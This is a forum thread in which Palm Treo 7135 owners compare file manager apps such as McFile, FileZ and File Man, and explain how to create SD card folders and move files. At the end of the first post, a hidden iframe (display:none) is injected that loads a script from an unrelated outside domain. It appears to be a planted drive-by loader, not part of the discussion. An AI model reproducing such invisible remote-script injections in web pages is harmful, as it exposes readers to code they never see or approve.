+ Reply to Thread

File Manager Operation

Regarding operation of the File Manager PDA App, I can't find any instructions in any user guide or help index or this board. Has anyone seen any instructions?

It appears that you can only move files between the phone and CD card. What I would like to do is move some picture files from the Palm/Launcher folder to another folder I created on the CD card called Palm/Launcher/Archives so the wait time on what's in the Launcher folder is minimized. Any thoughts?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    RayB

Get a card reader

I didn't even bother to look at the file manager appp yet.
    Having had a Tungsten T prior, I do virtually all of the file operations on my desktop via a card readner. It's WAY faster than anything you can do on the palm. Especially when it comes to transfering mp3's and pictures.

Thanks Jabo. I do have a Cruser and after your post I now realize it would probably take less time to transfer large files using the method you suggest.

Also, many of my pictures in the SD card Launcher folder are ony 40K and transferring them to an archieve file on the SD card via a file manager program on the palm is still an attractive option for me since the "Album" feature is only available after all pictures in the Launcher folder are opened (unless I am missing something). My goal is to reduce the "waiting time" before you can select the pictures you want.

I just read about McFile, another file manager program, and this may solve my problem.
    RayB

I just read about McFile, another file manager program, and this may solve my problem

FileZ is great and very powerful. And it's free!.
    http://www.palmgear.com/software/sho...fm?prodID=9992
    The only limitation is that it does not allow you to create a new directory.

How do you create a new folder that is under a current folder? And then, how do you move files into that folder?

I need to create a folder /palm/programs/mapopolis, and then move map files from RAM into that folder.

Also, what is the function of the HOME folder?
    John H. Boyd

How do you create a new folder that is under a current folder? And then, how do you move files into that folder?
    To create a new folder click "FileManager" App, then click on upper left corner of screen "Internal" or "Card" then click on folders until you get the one you want the new folder to be under then click "FileManager" in upper left then click "New Folder" and enter your new folder name.

To transfer files use Cruser or another file manager program listed above.
    RayB

Originally posted by rjblake
    To create a new folder click "FileManager" App, then click on upper left corner of screen "Internal" or "Card" then click on folders until you get the one you want the new folder to be under then click "FileManager" in upper left then click "New Folder" and enter your new folder name.

When I do this, I get a new folder at the same level as the one I clicked on,
    John H. Boyd

The new folder is created in the directory you're currently in.
    To descend into a directory to create a subdir in it, click on the folder icon. Clicking on just the name will not cause you to enter it.

I also would like to know if FileManager can move files between folders on the SD card... I use FileZ to do that, but when moving large files, sometimes I get a RSOD after it's done.

Originally posted by KLiuLess
    The new folder is created in the directory you're currently in.
    To descend into a directory to create a subdir in it, click on the folder icon. Clicking on just the name will not cause you to enter it.

I also would like to know if FileManager can move files between folders on the SD card... I use FileZ to do that, but when moving large files, sometimes I get a RSOD after it's done.
    Thanks. That worked. Also, I checked by copying a couple of files between folders on the card, one of them 2.5mb, and it worked just fine. BTW, this is File Man from Bits 'n Bolts Software, ver 2.2
    John H. Boyd

Originally posted by JohnBoyd
    Thanks. That worked. Also, I checked by copying a couple of files between folders on the card, one of them 2.5mb, and it worked just fine. BTW, this is File Man from Bits 'n Bolts Software, ver 2.2
    Oh, I thought you meant the built-in File Mgr. You should have said so in the first place
    It the Bits/Bolts version free? How easy is it to move files? With Filez, you have to enter the full destination path manually, which is a pain.

Originally posted by JohnBoyd
    I checked by copying a couple of files between folders on the card, one of them 2.5mb, and it worked just fine. BTW, this is File Man from Bits 'n Bolts Software, ver 2.2
    Is "File Man" a program on your 7135 or is it on your PC?

If its on your 7135 how do you order it?
    RayB

I found FileMan on Palmgear. It's shareware with a 7 day trial. I think I'm going to stick with FileZ.

Nobody asked for this review of file management tools but... I have 5 programs on my 7135 for file management but only use 3. I hightlighted the features unique to the 3 programs I use.

1. McFile is fast. It is quick and easy for all card file manipulation activity (add, rename, copy, and delete). This is the program I use most. It provides date information on files on a card which is important when you back up files or just store backups of old releases programs on the card. for example. Before I install the latest TAKEphONE, I copy the old one to a directory on my card.

2. Filez gives detailed information on a RAM files. It also provides info on Saved and Unsaved Preferences. Filez gives minimal information for files on the card (not even dates) and takes more work to manipulate card files and directories. It is FREE

3. LauncherX also gives a lot of information on files in RAM and the card. It gives creator ID, size, and version info on card files/programs. It moves files around but it is slow and any movement requires a scan (very slow).

4. TomCatalog is freeware that gives good information about RAM files. You can even delete files associated with a creator ID. It is tiny and keep it on the card but rarely use it. It is like Z'catalog for those who remember it. Quick and dirty (and dangerous if you check that allow dangerous box).

5. FileManager is pretty good for associating files with programs in RAM and is fast (relative to Filez). I don't do much with it accept to help identify orphan RAM files in a hierarchical format. If it wasn't in ROM, I'd delete it since other programs do what it does and better, IMO.

Beryl, thanks for a great review of file managers. Since McFile is fast I'll try it. My main use will be to move files from one SD card folder to another SD card folder to minimize wait time for listing mp3's and pictures.
    RayB

Originally posted by rjblake
    Beryl, thanks for a great review of file managers. Since McFile is fast I'll try it. My main use will be to move files from one SD card folder to another SD card folder to minimize wait time for listing mp3's and pictures.
    Glad it was helpful.

Note about "fast": Copying, deleting and moving MP3 files are slow operations no matter which of these programs you use. The speed I find w/McFile is opening up folders and bouncing from folder to folder. You might want to use the rename trick for your MP3 files. For example, you can name a folder "xAUDIO" where x=prefix and then rename it to "AUDIO" to put it into use. That is quick and easy with McFile since the dialog brings up the name -- AUDIO -- and then you just have to append a letter. I do audio books with 1AUDIO, 2AUDIO, .... which represent chapters so I just have to rename them to AUDIO. Also, I can delete the entire contents of a directory by deleting the folder and that is MUCH faster than deleting file by file.

McFile also allows you to set a default directory for each time it is invoked.

Why do file moves take so long?

I actually found an old version of McFile that's free, version 1.13.
    To my dismay, it doesn't perform moves from one SD folder to another like a desktop computer does... And from Beryl's post it looks like the newer versions are no different. I'm looking for a fast way to move files.

My concept of a file move within a certain partition:
    changing the file table so that the new directory points to the file instead of the old dir pointing to it.
    That way the entire file does NOT have to be read and written... Does anyone know why file moves on the 7135 are the equivalent of a copy-to-new-location then a delete-of-original? That takes forever on large files.

Is this a limitation of the PalmOS or the file app?

KLiuless -- You are right. A workstation/desktop is still the fastest option for actual file moves. I haven't found any Palm OS software fast enough for my likes. I posted another workstation option (Syncwizard) here:

http://www.smartphonesource.com/vbul...&threadid=7658

Originally posted by KLiuLess
    Oh, I thought you meant the built-in File Mgr. You should have said so in the first place
    It the Bits/Bolts version free? How easy is it to move files? With Filez, you have to enter the full destination path manually, which is a pain.
    With File Man, you create or move to the destination folder, and then tell File Man (tap a command) to make this the destination folder.

Cost is $10 or $15. I got it from Palm Gear in the same order as Power Run.
    John H. Boyd